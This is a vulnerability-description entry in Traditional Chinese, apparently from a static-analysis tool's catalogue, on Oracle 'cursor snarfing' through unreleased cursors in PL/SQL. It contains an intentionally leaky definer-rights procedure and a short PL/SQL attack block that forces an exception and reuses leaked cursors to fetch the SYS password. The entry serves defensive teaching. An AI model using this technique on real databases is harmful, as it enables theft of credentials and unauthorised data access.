Unreleased Resource: Cursor Snarfing

PLSQL/TSQL

Abstract

較低權限使用者可能會使用該指標。

Explanation

很可能利用指標存取未授權資訊。
資源洩漏至少有兩種常見原因：

- 錯誤條件以及其他異常情況。

- 不確定程式的哪一部份負責釋放資源。

在 SQL 中，指標擁有與建立權限的程式碼相關的權限。如果權限較少的使用者可以取得洩漏的指標，就可以使用該指標檢視未授權記錄。

此外，大部分的 Unreleased Resource 問題都會導致一般軟體可靠性問題，但是如果攻擊者蓄意觸發資源洩漏的話，攻擊者就可能會藉由耗盡資源集區的方式來發動 Denial of Service。

範例 1：無權存取 sys.dba_users 的程式碼可以使用 PWD_COMPARE 程序來檢查使用者密碼。


CREATE or REPLACE procedure PWD_COMPARE(p_user VARCHAR, p_pwd VARCHAR)
  AUTHID DEFINED
IS
  cursor INTEGER;
  ...
BEGIN
  IF p_user != 'SYS' THEN
    cursor := DBMS_SQL.OPEN_CURSOR;
    DBMS_SQL.PARSE(cursor, 'SELECT password FROM SYS.DBA_USERS WHERE username = :u', DBMS_SQL.NATIVE);
    DBMS_SQL.BIND_VARIABLE(cursor, ':u', p_user);
    ...
  END IF;
END PWD_COMPARE;

如果攻擊者可能造成異常，就可取得指標並存取未授權資訊，例如 sys密碼。造成異常的一個方式就是將過長的引數傳送到 p_user。攻擊者得知指標已洩漏後，只需要猜測指標並指派新連結變數即可。


DECLARE
  x VARCHAR(32000);
  i INTEGER;
  j INTEGER;
  r INTEGER;
  password VARCHAR2(30);
BEGIN
  FOR i IN 1..10000 LOOP
    x:='b' || x;
  END LOOP;
  SYS.PWD_COMPARE(x,'password');
EXCEPTION WHEN OTHERs THEN
  FOR j IN 1..10000
    DBMS_SQL.BIND_VARIABLE(j, ':u', 'SYS');
    DBMS_SQL.DEFINE_COLUMN(j, 1, password, 30);
    r := DBMS_SQL.EXECUTE(j);
    IF DBMS_SQL.FETCH_ROWS(j) > 0 THEN
      DBMS_SQL.COLUMN_VALUE(j, 1, password);
      EXIT;
    END IF;
  END LOOP;
  ...
END;

References

[1] David Litchfield Dangling Cursor Snarfing: A New Class of Attack in Oracle

[2] Standards Mapping - Common Weakness Enumeration CWE ID 619, CWE ID 772

[3] Standards Mapping - Common Weakness Enumeration Top 25 2019 [21] CWE ID 772

[4] Standards Mapping - DISA Control Correlation Identifier Version 2 CCI-001094

[5] Standards Mapping - General Data Protection Regulation (GDPR) Access Violation

[6] Standards Mapping - NIST Special Publication 800-53 Revision 4 SC-5 Denial of Service Protection (P1)

[7] Standards Mapping - NIST Special Publication 800-53 Revision 5 SC-5 Denial of Service Protection

[8] Standards Mapping - OWASP Top 10 2004 A9 Application Denial of Service

[9] Standards Mapping - Payment Card Industry Data Security Standard Version 1.1 Requirement 6.5.9

[10] Standards Mapping - Payment Card Industry Data Security Standard Version 3.0 Requirement 6.5.6

[11] Standards Mapping - Payment Card Industry Data Security Standard Version 3.1 Requirement 6.5.6

[12] Standards Mapping - Payment Card Industry Data Security Standard Version 3.2 Requirement 6.5.6

[13] Standards Mapping - Payment Card Industry Data Security Standard Version 3.2.1 Requirement 6.5.6

[14] Standards Mapping - Payment Card Industry Data Security Standard Version 4.0 Requirement 6.2.4

[15] Standards Mapping - Payment Card Industry Data Security Standard Version 4.0.1 Requirement 6.2.4

[16] Standards Mapping - Payment Card Industry Software Security Framework 1.0 Control Objective 4.2 - Critical Asset Protection

[17] Standards Mapping - Payment Card Industry Software Security Framework 1.1 Control Objective 4.2 - Critical Asset Protection

[18] Standards Mapping - Payment Card Industry Software Security Framework 1.2 Control Objective 4.2 - Critical Asset Protection, Control Objective C.3.3 - Web Software Attack Mitigation

[19] Standards Mapping - SANS Top 25 2009 Risky Resource Management - CWE ID 404

[20] Standards Mapping - Security Technical Implementation Guide Version 3.1 APP6080 CAT II

[21] Standards Mapping - Security Technical Implementation Guide Version 3.4 APP6080 CAT II

[22] Standards Mapping - Security Technical Implementation Guide Version 3.5 APP6080 CAT II

[23] Standards Mapping - Security Technical Implementation Guide Version 3.6 APP6080 CAT II

[24] Standards Mapping - Security Technical Implementation Guide Version 3.7 APP6080 CAT II

[25] Standards Mapping - Security Technical Implementation Guide Version 3.9 APP6080 CAT II

[26] Standards Mapping - Security Technical Implementation Guide Version 3.10 APP6080 CAT II

[27] Standards Mapping - Security Technical Implementation Guide Version 4.2 APSC-DV-002400 CAT II

[28] Standards Mapping - Security Technical Implementation Guide Version 4.3 APSC-DV-002400 CAT II

[29] Standards Mapping - Security Technical Implementation Guide Version 4.4 APSC-DV-002400 CAT II

[30] Standards Mapping - Security Technical Implementation Guide Version 4.5 APSC-DV-002400 CAT II

[31] Standards Mapping - Security Technical Implementation Guide Version 4.6 APSC-DV-002400 CAT II

[32] Standards Mapping - Security Technical Implementation Guide Version 4.7 APSC-DV-002400 CAT II

[33] Standards Mapping - Security Technical Implementation Guide Version 4.8 APSC-DV-002400 CAT II

[34] Standards Mapping - Security Technical Implementation Guide Version 4.9 APSC-DV-002400 CAT II

[35] Standards Mapping - Security Technical Implementation Guide Version 4.10 APSC-DV-002400 CAT II

[36] Standards Mapping - Security Technical Implementation Guide Version 4.11 APSC-DV-002400 CAT II

[37] Standards Mapping - Security Technical Implementation Guide Version 4.1 APSC-DV-002400 CAT II

[38] Standards Mapping - Security Technical Implementation Guide Version 5.1 APSC-DV-002400 CAT II

[39] Standards Mapping - Security Technical Implementation Guide Version 5.2 APSC-DV-002400 CAT II

[40] Standards Mapping - Security Technical Implementation Guide Version 5.3 APSC-DV-002400 CAT II

[41] Standards Mapping - Security Technical Implementation Guide Version 6.1 APSC-DV-002400 CAT II

[42] Standards Mapping - Web Application Security Consortium Version 2.00 Denial of Service (WASC-10)

[43] Standards Mapping - Web Application Security Consortium 24 + 2 Denial of Service

desc.controlflow.sql.unreleased_resource_cursor_snarfing